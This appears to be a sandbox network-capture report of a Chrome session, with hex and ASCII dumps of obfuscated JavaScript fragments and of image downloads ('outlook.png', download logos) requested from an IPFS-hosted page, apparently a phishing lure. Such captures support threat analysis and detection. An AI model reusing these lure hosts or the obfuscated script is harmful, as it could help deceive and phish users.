                            2025-01-07 17:46:38 UTC4096INData Raw: 28 30 78 62 30 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 61 31 37 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 31 36 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 62 32 61 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 61 31 61 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 30 65 35 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 36 37 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 35 30 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 34 38 35 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 32 36 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 32 37 30 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 37 63 36 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 66 35 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 63 64 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 36 36 32 29 2b 5f 30
                            Data Ascii: (0xb08)+_0x417f08(0xa17)+_0x417f08(0x1163)+_0x417f08(0xb2a)+_0x417f08(0xa1a)+_0x417f08(0x10e5)+_0x417f08(0x1a67)+_0x417f08(0x503)+_0x417f08(0x1485)+_0x417f08(0x26e)+_0x417f08(0x1270)+_0x417f08(0x17c6)+_0x417f08(0x1f5e)+_0x417f08(0xcd3)+_0x417f08(0x662)+_0
                            2025-01-07 17:46:38 UTC4096INData Raw: 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 62 63 61 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 62 30 64 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 61 33 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 65 39 32 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 33 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 37 36 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 34 35 30 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 31 64 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 39 61 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 36 62 31 29 2b 5f 30 78 34 31 37 66
                            Data Ascii: )+_0x417f08(0xbca)+_0x417f08(0xb0d)+_0x417f08(0xa31)+_0x417f08(0xe92)+_0x417f08(0x13ee)+_0x417f08(0x1a76)+_0x417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x1450)+_0x417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x11de)+_0x417f08(0x9ae)+_0x417f08(0x6b1)+_0x417f
                            2025-01-07 17:46:38 UTC468INData Raw: 38 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 32 66 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 66 39 39 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 37 66 39 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 39 63 30 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 32 31 66 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 38 36 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 29 2b 28 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 62 35 64 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 32 30 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 33 65 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 31 38 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 34 37 34 29 2b 5f 30 78
                            Data Ascii: 8e)+_0x417f08(0x2fe)+_0x417f08(0xf99)+_0x417f08(0x7f9)+_0x417f08(0x19c0)+_0x417f08(0x121f)+_0x417f08(0x864)+_0x417f08(0x1a01)+_0x417f08(0x15ee))+(_0x417f08(0x1db8)+_0x417f08(0x1b5d)+_0x417f08(0x208)+_0x417f08(0x13e4)+_0x417f08(0x1183)+_0x417f08(0x474)+_0x
                            2025-01-07 17:46:38 UTC4096INData Raw: 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 33 33 39 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 33 64 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 35 61 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 31 31 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 38 62 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 35 31 63 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 39 61 39 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 36 30 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38
                            Data Ascii: 417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x339)+_0x417f08(0x13d3)+_0x417f08(0x5a3)+_0x417f08(0x1113)+_0x417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x15ee)+_0x417f08(0x18be)+_0x417f08(0x51c)+_0x417f08(0x19a9)+_0x417f08(0x1603)+_0x417f08(0x1a01)+_0x417f08
                            2025-01-07 17:46:39 UTC4096INData Raw: 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 61 64 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 33 31 39 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 30 39 62 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 33 34 30 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 66 34 30 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 32 31 33 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 30 38 36 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 31 31 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 39 31 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 65 32 62 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 34 64 35 29 2b 5f 30
                            Data Ascii: 8)+_0x417f08(0x1dad)+_0x417f08(0x319)+_0x417f08(0x109b)+_0x417f08(0x1340)+_0x417f08(0x1f40)+_0x417f08(0x2131)+_0x417f08(0x1086)+_0x417f08(0x1113)+_0x417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x15ee)+_0x417f08(0x914)+_0x417f08(0x1e2b)+_0x417f08(0x14d5)+_0
                            2025-01-07 17:46:39 UTC4096INData Raw: 37 66 30 38 28 30 78 31 36 64 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 62 33 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 66 37 35 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 30 35 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 62 35 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 37 38 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 38 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 32 30 63 61 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 39 33 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 32 32 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 65 62 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78
                            Data Ascii: 7f08(0x16d8)+_0x417f08(0xb34)+_0x417f08(0x1f75)+_0x417f08(0x1d05)+_0x417f08(0xb51)+_0x417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x15ee)+_0x417f08(0x1784)+_0x417f08(0x1584)+_0x417f08(0x20ca)+_0x417f08(0x93e)+_0x417f08(0x122e)+_0x417f08(0xeb1)+_0x417f08(0x
                            2025-01-07 17:46:39 UTC4096INData Raw: 64 37 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 62 66 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 66 33 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 61 65 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 63 32 66 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 62 37 64 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 38 36 36 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 38 37 62 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 65 32 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 65 32 61 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 38 33 37 29 2b 5f 30 78 34 31
                            Data Ascii: d73)+_0x417f08(0xbfe)+_0x417f08(0xf38)+_0x417f08(0x1a01)+_0x417f08(0x15ee)+_0x417f08(0xae8)+_0x417f08(0x1a01)+_0x417f08(0x15ee)+_0x417f08(0x1c2f)+_0x417f08(0xb7d)+_0x417f08(0x1866)+_0x417f08(0x187b)+_0x417f08(0x1e2)+_0x417f08(0xe2a)+_0x417f08(0x837)+_0x41
                            2025-01-07 17:46:39 UTC4096INData Raw: 30 78 31 66 34 33 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 63 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 63 37 62 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 34 33 35 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 65 34 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 32 31 32 66 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 35 65 65 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 64 62 38 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 61 30 31 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 31 30 39 30 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 63 31 62 29 2b 5f 30 78 34 31 37 66 30 38 28 30 78 34 63 30 29 2b
                            Data Ascii: 0x1f43)+_0x417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x15ee)+_0x417f08(0x1c4)+_0x417f08(0xc7b)+_0x417f08(0x435)+_0x417f08(0x1ae4)+_0x417f08(0x212f)+_0x417f08(0x15ee)+_0x417f08(0x1db8)+_0x417f08(0x1a01)+_0x417f08(0x1090)+_0x417f08(0xc1b)+_0x417f08(0x4c0)+


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.164971891.134.9.1604436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:40 UTC648OUTGET /5rThDVw/outlook.png HTTP/1.1
                            Host: i.ibb.co
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:40 UTC382INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 07 Jan 2025 17:46:40 GMT
                            Content-Type: image/png
                            Content-Length: 2503
                            Connection: close
                            Last-Modified: Mon, 29 Jul 2024 16:21:00 GMT
                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                            Cache-Control: max-age=315360000
                            Cache-Control: public
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, OPTIONS
                            Accept-Ranges: bytes
                            2025-01-07 17:46:40 UTC2503INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 6c 08 06 00 00 00 a2 b8 ba 32 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                            Data Ascii: PNGIHDRl2tEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.1649721195.35.33.2154436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:40 UTC662OUTGET /new/arsm/media/download-logo.png HTTP/1.1
                            Host: wafsd.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:40 UTC597INHTTP/1.1 200 OK
                            Connection: close
                            cache-control: public, max-age=604800
                            expires: Tue, 14 Jan 2025 17:46:40 GMT
                            content-type: image/png
                            last-modified: Fri, 05 Jan 2024 15:01:56 GMT
                            etag: "1e42-659819e4-9612b5e74948e7b0;;;"
                            accept-ranges: bytes
                            content-length: 7746
                            date: Tue, 07 Jan 2025 17:46:40 GMT
                            server: LiteSpeed
                            platform: hostinger
                            panel: hpanel
                            content-security-policy: upgrade-insecure-requests
                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                            2025-01-07 17:46:40 UTC771INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 4c 08 06 00 00 00 d7 fe 8a 9b 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 00 18 74 45 58 74 53 6f 66 74 77 61 72 65 00 70 61 69 6e 74 2e 6e 65 74 20 34 2e 30 2e 35 65 85 32 65 00 00 1d c0 49 44 41 54 78 5e ed 5d 09 98 24 45 99 ed e1 70 51 54 a0 bb b2 aa 9b 9d 05 71 15 05 af 75 65 d5 f5 c0 15 64 71 11 51 41 4e b9 d5 59 04 66 e8 ca ac 1e 66 f0 68 0f 0e 41 97 4b 05 c6 45 58 91 cf c5 71 97 73 a6 bb 22 ab db e6 66 17 06 e4 66 38 45 41 ce 01 1c d8 11 19 47 7a df 8b 8c ae ae 8c 88 ae ca ac ac ee ae ee 8e f7 7d ff 37 d3 95 7f 44 fc 11 19 f1 f2 8f bb a3 dd b1 c5 71 23 5b 76 07 c3 db 76 f7 86 3b 79 7e b8 7b be 18 7e b0 63 f9
                            Data Ascii: PNGIHDR,LgAMAapHYs(JtEXtSoftwarepaint.net 4.0.5e2eIDATx^]$EpQTquedqQANYffhAKEXqs"ff8EAGz}7Dq#[vv;y~{~c
                            2025-01-07 17:46:40 UTC6975INData Raw: cf 3a 16 2c db 54 3d 76 68 80 7c 69 e0 dd 7a f9 41 6e 50 8f 5b 0b 4b 42 6d 2d 63 84 d5 e3 8f e4 f0 ff bb 6c 3a 93 29 a8 dc 2f e3 df ab f0 55 d9 5c 15 e1 94 c0 0b 06 0f 29 f8 e2 72 90 d4 6f 20 cf e6 03 f1 d2 04 7b 33 5f e5 17 8e 5e 03 74 1e f7 4a e1 30 c8 ed 60 6e a9 52 51 39 68 70 84 95 0d 8e b0 ea c8 74 13 96 92 17 e8 c1 a8 22 9c 1c f4 f7 6f d4 d5 17 6e 5d f0 2b 0b 91 cf 47 40 3e d9 76 1a f8 e2 b7 dc 5e d5 b3 a8 b2 8d 1b 9f 89 c3 11 56 36 38 c2 aa 23 ed 41 58 e2 12 78 58 79 55 84 2d 07 f3 97 2f 86 01 d2 ba dd 4c 3b 93 6c 80 ed f7 16 fc f2 91 1d 48 43 25 37 e7 e1 08 2b 1b 1c 61 d5 91 e9 24 2c d9 d5 0a c2 6f 6c 7b d8 c8 66 aa f8 5a 0e 1e 09 8d 2e dc 39 f0 88 fe ac a7 af c9 7a 90 0f bb 85 7f 80 5d 6b d0 4d 7c 8e ff 87 bc d8 28 2c bb b5 e8 5e 9e b1 d5 f1 95
                            Data Ascii: :,T=vh|izAnP[KBm-cl:)/U\)ro {3_^tJ0`nRQ9hpt"on]+G@>v^V68#AXxXyU-/L;lHC%7+a$,ol{fZ.9z]kM|(,^


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.1649720195.35.33.2154436900C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2025-01-07 17:46:40 UTC657OUTGET /new/arsm/media/download.gif HTTP/1.1
                            Host: wafsd.com
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Referer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2025-01-07 17:46:40 UTC598INHTTP/1.1 200 OK
                            Connection: close
                            cache-control: public, max-age=604800
                            expires: Tue, 14 Jan 2025 17:46:40 GMT
                            content-type: image/gif
                            last-modified: Fri, 05 Jan 2024 15:01:56 GMT
                            etag: "1a6fb-659819e4-8867427b42dc9c;;;"
                            accept-ranges: bytes
                            content-length: 108283
                            date: Tue, 07 Jan 2025 17:46:40 GMT
                            server: LiteSpeed
                            platform: hostinger
                            panel: hpanel
                            content-security-policy: upgrade-insecure-requests
                            alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                            2025-01-07 17:46:40 UTC770INData Raw: 47 49 46 38 39 61 6a 01 6a 01 f7 00 00 00 ff 00 78 79 78 7a 7a 7a 7b 7b 7c 7b 7c 7b 7d 7c 7c 7d 7d 7c 7d 7d 7e 7d 7e 7c 7d 7e 7f 7e 7e 7e 7e 7e 7f 7e 7e 80 7e 7f 7e 7e 80 7e 7f 7d 7e 7f 7f 7e 7f 7f 7f 7f 7f 80 7f 7f 80 7f 80 7f 80 7f 7f 80 7f 80 80 80 80 80 80 80 80 81 7f 81 80 80 81 81 81 81 81 81 81 82 81 82 82 82 82 82 82 82 82 83 82 84 82 83 83 83 83 83 83 83 84 83 84 83 84 84 84 84 84 85 84 85 85 85 85 85 86 86 85 86 86 86 85 86 86 86 87 87 87 87 87 87 87 87 88 87 88 87 88 88 88 89 89 89 89 89 89 89 89 8a 89 8a 89 8a 89 8a 8a 8a 8a 8b 8a 8a 8b 8b 8b 8b 8b 8c 8b 8c 8b 8c 8c 8c 8d 8c 8c 8d 8d 8d 8d 8d 8d 8d 8d 8e 8d 8d 8e 8e 8e 8e 8e 8f 8f 8f 8f 8f 90 8f 90 90 90 8f 90 90 90 90 91 90 91 91 92 93 93 92 93 93 93 94 94 94 94 95 94 95 94 95 96 96 95 96 96
                            Data Ascii: GIF89ajjxyxzzz{{|{|{}||}}|}}~}~|}~~~~~~~~~~~~}~~
                            2025-01-07 17:46:40 UTC14994INData Raw: ff ff ff ff ff ff ff ff ff ff ff 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 08 00 00 00 2c 00 00 00 00 6a 01 6a 01 00 08 ff 00 01 08 1c 48 b0 a0 c1 83 08 13 2a 5c c8 b0 a1 c3 87 10 23 4a 9c 48 b1 a2 c5 8b 18 33 6a dc c8 b1 a3 c7 8f 20 43 8a 1c 49 b2 a4 c9 93 28 53 aa 5c c9 b2 a5 cb 97 30 63 ca 9c 49 b3 a6 cd 9b 38 73 ea dc c9 b3 a7 cf 9f 40 83 0a 1d 4a b4 a8 d1 a3 48 93 2a 5d ca b4 a9 d3 a7 50 a3 4a 9d 4a b5 aa d5 ab 58 b3 6a dd ca b5 ab d7 af 60 c3 8a 1d 4b b6 ac d9 b3 68 d3 aa 5d cb b6 ad db b7 70 e3 ca 9d 4b b7 ae dd bb 78 f3 ea dd cb b7 af df bf 80 03 0b 1e 4c b8 b0 e1 c3 88 13 2b 5e cc b8 b1 e3 c7 90 23 4b 9e 4c b9 b2 e5 cb 98 33 6b de cc b9 b3 e7 cf a0 43 8b 1e 4d ba b4 e9 d3 a8 53 ab 5e cd ba b5 eb d7 b0 63 cb 9e 4d bb b6
                            Data Ascii: !NETSCAPE2.0!,jjH*\#JH3j CI(S\0cI8s@JH*]PJJXj`Kh]pKxL+^#KL3kCMS^cM
                            2025-01-07 17:46:40 UTC16384INData Raw: 7f ff cc f4 1f 00 82 04 af 5f 04 5c 50 77 ad a1 0b 83 30 7f f6 87 07 77 80 07 78 e0 07 db 67 19 d6 b0 07 83 e7 7f d7 77 03 78 10 3a fe 36 09 7c 70 7f 0a 78 07 77 50 07 77 90 7f 9c 11 0c 60 60 6c 16 60 7d 11 00 02 5e f0 09 b1 d1 0c 82 90 07 1b c8 81 75 10 83 bb f7 7e 97 e1 0a c0 07 77 12 70 01 12 70 03 79 30 1b ae b0 07 1d 18 83 75 40 07 44 98 07 9a 60 81 9b 11 0c 6a 30 78 85 17 01 17 20 02 5a d0 79 ea 16 08 43 48 84 74 30 07 74 20 07 74 30 08 34 58 19 4b e6 64 4f 46 7c 12 20 03 75 d0 85 aa d1 0c 8c 80 07 44 38 07 73 20 07 5a 08 07 79 20 85 98 d1 0c 74 00 5f 5b 17 7c 1b e0 04 8e 80 84 b0 c1 66 7b 40 84 6e 18 88 71 30 65 72 68 19 d3 a7 75 07 96 60 c4 c7 02 6c 60 0b b5 ff f1 0d 86 90 85 72 10 07 94 48 89 72 a0 07 85 48 19 df 80 08 c1 55 78 0a e6 84 44 50 08
                            Data Ascii: _\Pw0wxgwx:6|pxwPw``l`}^u~wppy0u@D`j0x ZyCHt0t t04XKdOF| uD8s Zy t_[|f{@nq0erhu`l`rHrHUxDP
                            2025-01-07 17:46:40 UTC16384INData Raw: a6 8f 39 89 6c 60 bf 9c a1 c1 cc ab 7d 79 60 97 a6 21 a9 9c 48 7b 93 9b b9 6e 09 8b 8c f7 05 e4 a7 b0 53 a8 02 7b 30 bb 6e bb c1 bc e8 b2 b2 f1 ae e0 89 88 2a 40 bd 3a bb a3 57 ba 8d b3 81 a8 74 78 88 6c 80 c1 3a 9b 95 bc 28 9b 4e ac b4 15 cb b3 13 6b 19 60 eb 87 84 29 a2 b6 d1 08 29 cc 8e 79 40 a5 93 81 c2 3b 7a b4 1c 7a 1b 85 b0 83 65 2c c5 54 fb 17 c1 20 06 65 ff bc b1 99 9a b5 b8 b1 07 89 4a c8 68 9c af 74 28 93 16 40 9e b6 81 08 11 99 92 f4 97 06 f0 9b af 7e ab 97 5b 09 a3 bc 91 08 f4 68 b0 87 a8 06 9f ac a5 0a bb b1 13 f9 aa 7c e0 1b 83 9c c7 5d a8 ca 8f 51 b9 cf a8 99 16 c0 97 be f1 07 14 ba 9f d1 d6 18 d7 58 c3 a6 58 02 ed 0a 1c 79 90 a0 fb e9 06 81 0c a5 59 b9 c5 0c 80 c9 bd 61 08 79 f9 c6 0f e0 06 ab 5c 18 c3 1c c9 8e d9 b6 5e fa c2 65 4c 7f 6b
                            Data Ascii: 9l`}y`!H{nS{0n*@:Wtxl:(Nk`))y@;zze,T eJht(@~[h|]QXXyYay\^eLk
                            2025-01-07 17:46:40 UTC16384INData Raw: 74 b6 30 e5 9d 54 82 a0 67 09 7a ee c8 e7 8c 87 ce 48 28 8f ac 32 70 a8 8e 5e e6 ff 58 a3 0d 62 d0 61 64 30 91 e6 c4 66 21 74 8c 21 27 10 2d 8e d9 e2 0b c4 c6 a0 82 a7 a0 c6 68 c2 b2 a2 ea 29 aa a9 16 9c 0a c2 aa 7e 3e c0 00 a1 af 06 fa a5 ac 14 6a a2 89 2b b9 ce c4 26 23 75 c4 59 04 10 3d f4 80 6e a6 9a c6 e0 6e 0b f0 b2 80 c2 bc cb d6 6b 82 08 22 80 b0 41 b3 cf f2 49 e8 a9 7e 5a 90 2d 8f 87 de 88 a3 c1 38 8a 99 47 23 df 86 cb 52 80 9d f8 81 46 83 10 aa 8b ae ba ec 66 fa 6e bc f3 d2 6b 2f be 1e 80 ec 27 c0 d3 06 4c ed 8e d7 12 2c 30 a2 37 1a fc 62 1f 8c 3a 7c 12 79 a5 28 72 87 af 13 42 08 c4 b9 e8 ae ab 83 0e 36 e0 20 83 bb 31 70 dc f1 d1 f2 ca 8b 42 0b 2c 30 8d 82 95 7a 7a e0 c1 06 17 a0 ec aa ab 02 bb 4a 6d ca ac 6e fb 25 1c 8b 82 2b 33 48 23 aa 92 88
                            Data Ascii: t0TgzH(2p^Xbad0f!t!'-h)~>j+&#uY=nnk"AI~Z-8G#RFfnk/'L,07b:|y(rB6 1pB,0zzJmn%+3H#
